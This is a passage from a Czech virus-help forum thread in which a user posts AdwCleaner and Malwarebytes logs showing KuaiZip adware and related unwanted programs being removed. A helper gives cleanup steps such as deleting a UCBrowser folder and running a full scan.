[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.006
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.007
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.008
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.009
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.01
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.010
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.011
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.012
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.013
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.014
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.015
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.016
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.017
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.018
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.019
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.02
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.020
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.021
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.022
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.023
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.024
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.025
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.026
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.027
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.028
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.029
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.03
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.030
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.031
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.032
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.033
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.034
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.035
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.036
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.037
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.038
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.039
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.04
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.040
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.041
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.042
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.043
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.044
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.045
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.046
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.047
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.048
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.049
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.05
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.050
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.051
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.052
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.053
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.054
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.055
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.056
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.057
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.058
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.059
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.06
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.060
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.061
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.062
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.063
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.064
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.065
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.066
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.067
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.068
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.069
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.07
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.070
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.071
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.072
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.073
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.074
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.075
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.076
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.077
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.078
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.079
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.08
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.080
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.081
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.082
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.083
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.084
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.085
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.086
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.087
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.088
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.089
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.09
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.090
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.091
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.092
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.093
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.094
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.095
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.096
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.097
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.098
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.099
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.7z
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.arj
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.bz2
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.cab
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.gz
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.gzip
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.jar
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.kz
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.lzh
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.mou
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.rar
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.rpm
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.tar
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.tbz
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.tgz
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.wim
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.z
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.zip
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZipMount.ape
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZipMount.bin
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZipMount.ccd
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZipMount.cue
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZipMount.flac
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZipMount.iso
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZipMount.isz
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZipMount.mdf
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZipMount.mds
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZipMount.nrg
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZipMount.vcd
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZipMount.wv
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZipMount_FileAsso.Origin
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip_FileAsso.Origin
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell.ContextMenuExt
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell.ContextMenuExt.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell.DragDropMenu
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell.DragDropMenu.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell.KYDropHandler
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell.KYDropHandler.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell.KzShlobj
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell.KzShlobj.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell.PropertyExt
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell.PropertyExt.1
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{9CC34070-3A38-4C7A-89CB-EF8177EF07A1}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{813A22E0-3E2B-4188-9BDA-ECA9878B8D48}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{BCFF5F55-6F44-11D2-86F8-00104B265ED5}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}
[-] Key deleted: HKU\.DEFAULT\Software\UpgSvr
[-] Key deleted: HKU\S-1-5-21-732140370-2414468103-320680840-1003\Software\Installer
[-] Key deleted: HKU\S-1-5-21-732140370-2414468103-320680840-1003\Software\AutoTime
[-] Key deleted: HKU\S-1-5-21-732140370-2414468103-320680840-1003\Software\KuaiZip
[-] Key deleted: HKU\S-1-5-21-732140370-2414468103-320680840-1003\Software\SNDA
[-] Key deleted: HKU\S-1-5-21-732140370-2414468103-320680840-1003\Software\KuaiZipSFX
[-] Key deleted: HKU\S-1-5-21-732140370-2414468103-320680840-1003\Software\PopWnd
[-] Key deleted: HKU\S-1-5-21-732140370-2414468103-320680840-1003\Software\UpgSvr
[#] Key deleted on reboot: HKU\S-1-5-18\Software\UpgSvr
[#] Key deleted on reboot: HKCU\Software\Installer
[#] Key deleted on reboot: HKCU\Software\AutoTime
[#] Key deleted on reboot: HKCU\Software\KuaiZip
[#] Key deleted on reboot: HKCU\Software\SNDA
[#] Key deleted on reboot: HKCU\Software\KuaiZipSFX
[#] Key deleted on reboot: HKCU\Software\PopWnd
[#] Key deleted on reboot: HKCU\Software\UpgSvr
[-] Key deleted: HKLM\SOFTWARE\trotuxSoftware
[-] Key deleted: HKLM\SOFTWARE\Microleaves
[-] Key deleted: HKLM\SOFTWARE\msServer
[-] Key deleted: HKLM\SOFTWARE\{84416237-6490-494D-9AD6-4994DD978971}
[#] Key deleted on reboot: [x64] HKCU\Software\Installer
[#] Key deleted on reboot: [x64] HKCU\Software\AutoTime
[#] Key deleted on reboot: [x64] HKCU\Software\KuaiZip
[#] Key deleted on reboot: [x64] HKCU\Software\SNDA
[#] Key deleted on reboot: [x64] HKCU\Software\KuaiZipSFX
[#] Key deleted on reboot: [x64] HKCU\Software\PopWnd
[#] Key deleted on reboot: [x64] HKCU\Software\UpgSvr
[-] Key deleted: [x64] HKLM\SOFTWARE\Microleaves
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\powermenu.en.softonic.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\softonic.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\powermenu.en.softonic.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\softonic.com
[-] Key deleted: HKLM\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\KuaiZipShlExt
[-] Key deleted: HKLM\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\KuaiZipShlExt
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\QZipShell.DLL
[-] Key deleted: HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\KuaiZipShlExt
[-] Value deleted: HKLM\SOFTWARE\Classes\.htm\OpenWithProgids [UCHTML.AssocFile.HTM]
[-] Value deleted: HKLM\SOFTWARE\Classes\.html\OpenWithProgids [UCHTML.AssocFile.HTML]
[-] Value deleted: HKLM\SOFTWARE\Classes\.mht\OpenWithProgids [UCHTML.AssocFile.MHT]
[-] Value deleted: HKLM\SOFTWARE\Classes\.shtm\OpenWithProgids [UCHTML.AssocFile.SHTM]
[-] Value deleted: HKLM\SOFTWARE\Classes\.shtml\OpenWithProgids [UCHTML.AssocFile.SHTML]
[-] Value deleted: HKLM\SOFTWARE\Classes\.webp\OpenWithProgids [UCHTML.AssocFile.WEBP]
[-] Value deleted: HKLM\SOFTWARE\Classes\.xht\OpenWithProgids [UCHTML.AssocFile.XHT]
[-] Value deleted: HKLM\SOFTWARE\Classes\.xhtml\OpenWithProgids [UCHTML.AssocFile.XHTML]

***** [ Web browsers ] *****

[-] [C:\Users\Y\AppData\Local\Google\Chrome\User Data\ChromeDefaultData] [extension] Deleted: okanipcmceoeemlbjnmnbdibhgpbllgc

*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [23570 Bytes] - [17/03/2017 17:26:44]
C:\AdwCleaner\AdwCleaner[S0].txt - [20920 Bytes] - [17/03/2017 17:24:32]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [23718 Bytes] ##########

#10 Příspěvek od **altrok** » 17 bře 2017 17:35

Dejte logy FRST.txt a Addition.txt - http://forum.viry.cz/viewtopic.php?f=30&t=133101
Pokud budete mit problemy se stazenim FRSTLauncheru, staci kdyz pouzijete samotny FRST.exe/FRST64.exe.

jarmyl · #11 Příspěvek od **jarmyl** » 17 bře 2017 17:50

dávám oba přílohou - hodně znaků na 1 zprávu

#12 Příspěvek od **altrok** » 17 bře 2017 19:54

Odstrante slozku C:\Program Files (x86)\UCBrowser

Nainstalujte MBAM a udelejte vlastni sken vsech disku - http://forum.viry.cz/viewtopic.php?f=29&t=144868

Upozorneni: tento sken zabere od 30 minut po nekolik hodin

jarmyl · #13 Příspěvek od **jarmyl** » 18 bře 2017 10:00

dobrý den, včera už jsem byl mimo internet. smazal jsem tedy složku dle instrukce, pak provedl sken:

Malwarebytes
http://www.malwarebytes.com

-Podrobnosti logovacího souboru-
Datum skenování: 18.03.17
Čas skenování: 8:41
Logovací soubor:
Správce: Ano

-Informace o softwaru-
Verze: 3.0.6.1469
Verze komponentů: 1.0.75
Aktualizovat verzi balíku komponent: 1.0.1530
Licence: Zkušební

-Systémová informace-
OS: Windows 10
CPU: x64
Systém souborů: NTFS
Uživatel: Y-THINK\Y

-Shrnutí skenování-
Typ skenování: Vlastní skenování
Výsledek: Dokončeno
Skenované objekty: 1142806
Uplynulý čas: 1 hod, 13 min, 0 sek

-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Povoleno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno

-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)

Modul: 0
(Nebyly zjištěny žádné škodlivé položky)

Klíč registru: 105
PUP.Optional.Kuaizip, HKLM\SOFTWARE\CLASSES\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}, Žádná uživatelská akce, [1418], [346210],1.0.1530
PUP.Optional.ProxyHijacker.BCM, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NLASVC\PARAMETERS\INTERNET\MANUALPROXIES, Žádná uživatelská akce, [4533], [-1],0.0.0
PUP.Optional.OnlineIO, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{52F7BE5C-2C3B-4C7B-A96D-F19B9EC1992D}, Žádná uživatelská akce, [697], [335317],1.0.1530
PUP.Optional.OnlineIO, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{F0847AE0-465A-4D7B-A555-AABB43B550F0}, Žádná uživatelská akce, [697], [321304],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.001, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.002, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.003, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.004, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.005, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.006, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.007, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.008, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.009, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.010, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.011, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.012, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.013, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.014, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.015, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.016, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.017, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.018, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.019, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.020, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.021, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.022, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.023, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.024, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.025, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.026, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.027, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.028, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.029, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.030, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.031, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.032, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.033, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.034, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.035, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.036, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.037, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.038, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.039, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.040, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.041, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.042, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.043, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.044, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.045, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.046, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.047, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.048, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.049, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.050, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.051, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.052, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.053, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.054, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.055, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.056, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.057, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.058, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.059, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.060, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.061, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.062, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.063, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.064, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.065, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.066, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.067, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.068, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.069, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.070, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.071, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.072, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.073, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.074, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.075, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.076, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.077, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.078, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.079, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.080, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.081, Žádná uživatelská akce, [84], [374779],1.0.1530
Adware.Kuaiba, HKLM\SOFTWARE\CLASSES\.082, Žádná uživatelská akce, [84], [374779],1.0.1530
